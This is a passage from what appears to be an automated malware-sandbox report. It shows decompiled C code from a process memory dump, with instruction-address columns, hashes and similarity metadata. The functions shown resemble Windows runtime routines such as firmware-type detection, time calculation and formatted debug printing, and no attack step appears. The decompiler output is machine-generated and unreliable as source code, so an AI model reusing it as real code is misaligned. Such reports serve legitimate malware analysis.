						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E055EAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L055C4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E055EAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0562500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E055E9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                        0x056251be
                                                                        0x056251c3
                                                                        0x056251c8
                                                                        0x056251cd
                                                                        0x056251d0
                                                                        0x056251d3
                                                                        0x056251d8
                                                                        0x056251db
                                                                        0x056251de
                                                                        0x056251e0
                                                                        0x056251e3
                                                                        0x056251e6
                                                                        0x056251e8
                                                                        0x05625342
                                                                        0x05625351
                                                                        0x05625356
                                                                        0x0562535a
                                                                        0x05625360
                                                                        0x05625363
                                                                        0x05625366
                                                                        0x05625369
                                                                        0x05625369
                                                                        0x0562536b
                                                                        0x0562536b
                                                                        0x05625370
                                                                        0x056253a3
                                                                        0x056253a4
                                                                        0x056253a6
                                                                        0x056253ab
                                                                        0x056253ab
                                                                        0x056253ae
                                                                        0x056253ae
                                                                        0x056253b5
                                                                        0x056253bf
                                                                        0x056253bf
                                                                        0x05625375
                                                                        0x05625396
                                                                        0x056253a0
                                                                        0x056253a0
                                                                        0x00000000
                                                                        0x05625396
                                                                        0x05625377
                                                                        0x05625379
                                                                        0x0562537f
                                                                        0x0562538c
                                                                        0x05625390
                                                                        0x00000000
                                                                        0x05625390
                                                                        0x056251ee
                                                                        0x056251f1
                                                                        0x05625301
                                                                        0x05625310
                                                                        0x05625315
                                                                        0x05625318
                                                                        0x0562531b
                                                                        0x05625320
                                                                        0x0562532e
                                                                        0x05625331
                                                                        0x00000000
                                                                        0x05625331
                                                                        0x05625328
                                                                        0x05625329
                                                                        0x00000000
                                                                        0x05625329
                                                                        0x056251fa
                                                                        0x05625235
                                                                        0x05625236
                                                                        0x05625239
                                                                        0x0562523f
                                                                        0x05625240
                                                                        0x05625241
                                                                        0x05625242
                                                                        0x05625246
                                                                        0x05625247
                                                                        0x0562524e
                                                                        0x05625251
                                                                        0x05625267
                                                                        0x05625269
                                                                        0x0562526e
                                                                        0x0562527d
                                                                        0x0562527e
                                                                        0x05625281
                                                                        0x05625282
                                                                        0x05625287
                                                                        0x05625288
                                                                        0x0562528a
                                                                        0x0562528f
                                                                        0x05625294
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0562529a
                                                                        0x0562529c
                                                                        0x0562529e
                                                                        0x0562529e
                                                                        0x056252a4
                                                                        0x056252b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056252ba
                                                                        0x056252bc
                                                                        0x056252bc
                                                                        0x056252d4
                                                                        0x056252d9
                                                                        0x056252dc
                                                                        0x056252e1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056252e7
                                                                        0x056252f4
                                                                        0x00000000
                                                                        0x056252f4
                                                                        0x05625270
                                                                        0x00000000
                                                                        0x05625270
                                                                        0x056251fc
                                                                        0x056251fd
                                                                        0x05625202
                                                                        0x05625203
                                                                        0x05625205
                                                                        0x0562520a
                                                                        0x0562520f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0562521b
                                                                        0x05625226
                                                                        0x0562522b
                                                                        0x0562521d
                                                                        0x0562521d
                                                                        0x05625222
                                                                        0x05625222
                                                                        0x0562522d
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: acdcd316789a4e176f249c25c148e1c6639ee2600cb03ed064f8be49e17090b0
                                                                        • Instruction ID: aec2c033428671d94a3eba38e9b03f11a9f4d1a595feb4b72dbf1b6726d95890
                                                                        • Opcode Fuzzy Hash: acdcd316789a4e176f249c25c148e1c6639ee2600cb03ed064f8be49e17090b0
                                                                        • Instruction Fuzzy Hash: 05518D71A04B199FDB24DFA8D884AADBBF9FF58700F14402DE54AEF291EA719901CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 76%
                                                                        			E055CB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x569d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E055C7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E05678CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E055E9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E055EB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E055ECE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E055C7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E05678F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E055EAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x5698628; // 0x0
								_v68 = _t77;
								_t78 =  *0x569862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x5698628; // 0x0
							_t116 =  *0x569862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                        0x055cb94c
                                                                        0x055cb956
                                                                        0x055cb95c
                                                                        0x055cb95e
                                                                        0x055cb964
                                                                        0x055cb969
                                                                        0x055cb96d
                                                                        0x055cb96d
                                                                        0x055cb970
                                                                        0x055cb974
                                                                        0x055cb97a
                                                                        0x055cbadf
                                                                        0x055cbadf
                                                                        0x055cbae2
                                                                        0x055cbae4
                                                                        0x055cbae6
                                                                        0x055cbaf0
                                                                        0x05612cb8
                                                                        0x055cbaf6
                                                                        0x055cbaf6
                                                                        0x055cbaf6
                                                                        0x055cbafd
                                                                        0x055cbb1f
                                                                        0x055cbb1f
                                                                        0x055cbaff
                                                                        0x055cbb00
                                                                        0x055cbb00
                                                                        0x055cbb03
                                                                        0x055cbb03
                                                                        0x055cbacb
                                                                        0x055cbacf
                                                                        0x055cbad0
                                                                        0x055cbad1
                                                                        0x055cbadc
                                                                        0x055cbadc
                                                                        0x055cb980
                                                                        0x055cb980
                                                                        0x055cb988
                                                                        0x055cb98b
                                                                        0x055cb98d
                                                                        0x055cb990
                                                                        0x055cb993
                                                                        0x055cb999
                                                                        0x055cb99b
                                                                        0x055cb9a1
                                                                        0x055cb9a5
                                                                        0x055cb9aa
                                                                        0x055cb9b0
                                                                        0x055cb9bb
                                                                        0x055cb9c0
                                                                        0x055cb9c3
                                                                        0x055cb9ca
                                                                        0x055cb9cc
                                                                        0x055cb9cf
                                                                        0x055cb9d3
                                                                        0x055cb9d7
                                                                        0x055cba94
                                                                        0x055cba94
                                                                        0x055cba98
                                                                        0x055cbaa3
                                                                        0x05612ccb
                                                                        0x055cbaa9
                                                                        0x055cbaa9
                                                                        0x055cbaa9
                                                                        0x055cbab1
                                                                        0x05612cd5
                                                                        0x05612cdd
                                                                        0x05612cdd
                                                                        0x055cbabb
                                                                        0x055cbabc
                                                                        0x055cbac2
                                                                        0x055cbac3
                                                                        0x055cbac3
                                                                        0x055cbac6
                                                                        0x00000000
                                                                        0x055cb9dd
                                                                        0x055cb9dd
                                                                        0x055cb9e7
                                                                        0x055cb9e7
                                                                        0x055cb9ec
                                                                        0x055cb9ec
                                                                        0x055cb9f1
                                                                        0x055cb9f5
                                                                        0x055cb9fa
                                                                        0x055cba00
                                                                        0x055cba0c
                                                                        0x055cba10
                                                                        0x055cba10
                                                                        0x055cba12
                                                                        0x055cba18
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055cbb26
                                                                        0x055cbb26
                                                                        0x055cba1e
                                                                        0x055cba1e
                                                                        0x055cba23
                                                                        0x055cba25
                                                                        0x055cba2c
                                                                        0x055cba30
                                                                        0x055cba35
                                                                        0x055cba35
                                                                        0x055cba41
                                                                        0x055cba46
                                                                        0x055cba4c
                                                                        0x055cba50
                                                                        0x055cba54
                                                                        0x055cba6a
                                                                        0x055cba6e
                                                                        0x055cba70
                                                                        0x055cba74
                                                                        0x055cba78
                                                                        0x055cba7a
                                                                        0x055cba7c
                                                                        0x055cba8e
                                                                        0x055cba90
                                                                        0x055cba92
                                                                        0x055cbb14
                                                                        0x055cbb14
                                                                        0x055cbb16
                                                                        0x055cbb16
                                                                        0x00000000
                                                                        0x055cba7c
                                                                        0x055cbb0a
                                                                        0x055cbb0d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055cbb0f

                                                                        APIs
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 055CB9A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                        • String ID:
                                                                        • API String ID: 885266447-0
                                                                        • Opcode ID: b7e7ea96a9a238ef1d47ce19704ea5af03950317191997d9384c33b8c6993ce9
                                                                        • Instruction ID: 2694741617b14270321efd6c7a6250a746f5bea967d7efeff2e912f2cbfb6d2f
                                                                        • Opcode Fuzzy Hash: b7e7ea96a9a238ef1d47ce19704ea5af03950317191997d9384c33b8c6993ce9
                                                                        • Instruction Fuzzy Hash: 38514971A08345CFC720CFA9C48192ABBF6FB88720F5489AEF59687754D771E844CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055AB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E055AB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x567f7a8);
				E055FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E055FD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E055ED000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E055EF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L055FDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E055EB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E055EB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E055EE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E055EA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                        0x055ab171
                                                                        0x055ab171
                                                                        0x055ab171
                                                                        0x055ab171
                                                                        0x055ab171
                                                                        0x055ab176
                                                                        0x055ab17b
                                                                        0x055ab180
                                                                        0x055ab186
                                                                        0x055ab18f
                                                                        0x055ab198
                                                                        0x055ab1a4
                                                                        0x055ab1aa
                                                                        0x05604802
                                                                        0x05604802
                                                                        0x05604805
                                                                        0x0560480c
                                                                        0x0560480e
                                                                        0x055ab1d1
                                                                        0x055ab1d3
                                                                        0x055ab1de
                                                                        0x055ab1de
                                                                        0x05604817
                                                                        0x0560481e
                                                                        0x05604820
                                                                        0x05604822
                                                                        0x05604822
                                                                        0x05604824
                                                                        0x05604824
                                                                        0x0560482a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05604835
                                                                        0x0560483a
                                                                        0x0560483d
                                                                        0x0560483f
                                                                        0x05604842
                                                                        0x05604842
                                                                        0x05604842
                                                                        0x05604846
                                                                        0x0560484c
                                                                        0x0560484e
                                                                        0x05604851
                                                                        0x05604851
                                                                        0x05604853
                                                                        0x05604854
                                                                        0x05604854
                                                                        0x05604858
                                                                        0x0560485a
                                                                        0x0560485a
                                                                        0x0560485d
                                                                        0x0560485f
                                                                        0x05604861
                                                                        0x05604861
                                                                        0x05604866
                                                                        0x0560486b
                                                                        0x0560486e
                                                                        0x05604871
                                                                        0x05604876
                                                                        0x05604876
                                                                        0x05604878
                                                                        0x0560487b
                                                                        0x05604884
                                                                        0x05604884
                                                                        0x00000000
                                                                        0x0560487d
                                                                        0x0560487d
                                                                        0x05604882
                                                                        0x05604889
                                                                        0x05604889
                                                                        0x0560488f
                                                                        0x05604891
                                                                        0x056048e0
                                                                        0x056048e2
                                                                        0x056048e4
                                                                        0x056048e4
                                                                        0x056048e7
                                                                        0x056048e7
                                                                        0x056048ed
                                                                        0x056048f4
                                                                        0x056048f6
                                                                        0x05604951
                                                                        0x05604951
                                                                        0x05604953
                                                                        0x05604953
                                                                        0x05604956
                                                                        0x05604956
                                                                        0x05604958
                                                                        0x05604959
                                                                        0x05604959
                                                                        0x0560495d
                                                                        0x0560495d
                                                                        0x0560495f
                                                                        0x0560495f
                                                                        0x05604965
                                                                        0x05604969
                                                                        0x056049ba
                                                                        0x056049ba
                                                                        0x056049c1
                                                                        0x056049c5
                                                                        0x056049cc
                                                                        0x056049d4
                                                                        0x056049d7
                                                                        0x056049da
                                                                        0x056049e4
                                                                        0x056049e5
                                                                        0x056049f3
                                                                        0x05604a02
                                                                        0x00000000
                                                                        0x05604a02
                                                                        0x05604972
                                                                        0x05604974
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05604976
                                                                        0x05604979
                                                                        0x05604982
                                                                        0x05604983
                                                                        0x05604984
                                                                        0x0560498b
                                                                        0x0560498d
                                                                        0x05604991
                                                                        0x05604993
                                                                        0x05604999
                                                                        0x0560499d
                                                                        0x056049a2
                                                                        0x056049a2
                                                                        0x056049a2
                                                                        0x05604999
                                                                        0x056049ac
                                                                        0x00000000
                                                                        0x056049b3
                                                                        0x056048f8
                                                                        0x056048fe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056048fe
                                                                        0x05604895
                                                                        0x0560489c
                                                                        0x056048ad
                                                                        0x056048b2
                                                                        0x056048b5
                                                                        0x056048b7
                                                                        0x056048ba
                                                                        0x056048bc
                                                                        0x056048c6
                                                                        0x056048c6
                                                                        0x056048cb
                                                                        0x056048d1
                                                                        0x056048d4
                                                                        0x056048d8
                                                                        0x056048d8
                                                                        0x00000000
                                                                        0x056048d8
                                                                        0x056048be
                                                                        0x056048c0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056048c2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056048c4
                                                                        0x00000000
                                                                        0x05604882
                                                                        0x0560487b
                                                                        0x05604904
                                                                        0x05604906
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05604908
                                                                        0x0560490e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05604910
                                                                        0x05604917
                                                                        0x05604917
                                                                        0x00000000
                                                                        0x05604917
                                                                        0x055ab1ba
                                                                        0x056047f9
                                                                        0x056047fc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x056047fc
                                                                        0x055ab1c0
                                                                        0x055ab1c0
                                                                        0x055ab1c3
                                                                        0x055ab1cb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID: _vswprintf_s
                                                                        • String ID:
                                                                        • API String ID: 677850445-0
                                                                        • Opcode ID: 1cbaafce1ad7efca6a3a66942a129e1cd188532122cef3f640ec83f0b4087906
                                                                        • Instruction ID: 96669cbd7bfd286a9e867e24b7b79e6086b6b738dba2b3cc8b85fd56cb937095
                                                                        • Opcode Fuzzy Hash: 1cbaafce1ad7efca6a3a66942a129e1cd188532122cef3f640ec83f0b4087906
                                                                        • Instruction Fuzzy Hash: 4351CF71E0425A8EDF39CF64C844BBEBBB1BF44711F1045ADDA59AB681DB708941CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D2581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E055D2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a1, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t233;
				signed int _t237;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				signed int _t256;
				signed int _t263;
				signed int _t266;
				signed int _t274;
				signed int _t280;
				signed int _t282;
				void* _t284;
				signed int _t285;
				unsigned int _t288;
				signed int _t292;
				signed int _t294;
				signed int _t298;
				intOrPtr _t310;
				signed int _t319;
				signed int _t321;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t330;
				signed int _t331;
				signed int _t333;
				signed int _t340;
				void* _t341;
				void* _t343;

				_t333 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0x569d360 ^ _t333;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t326 = 0x569b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t288 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t343 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t280 = 0x48;
				_t308 = 0 | _t343 == 0x00000000;
				_t319 = 0;
				_v37 = _t343 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t280 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
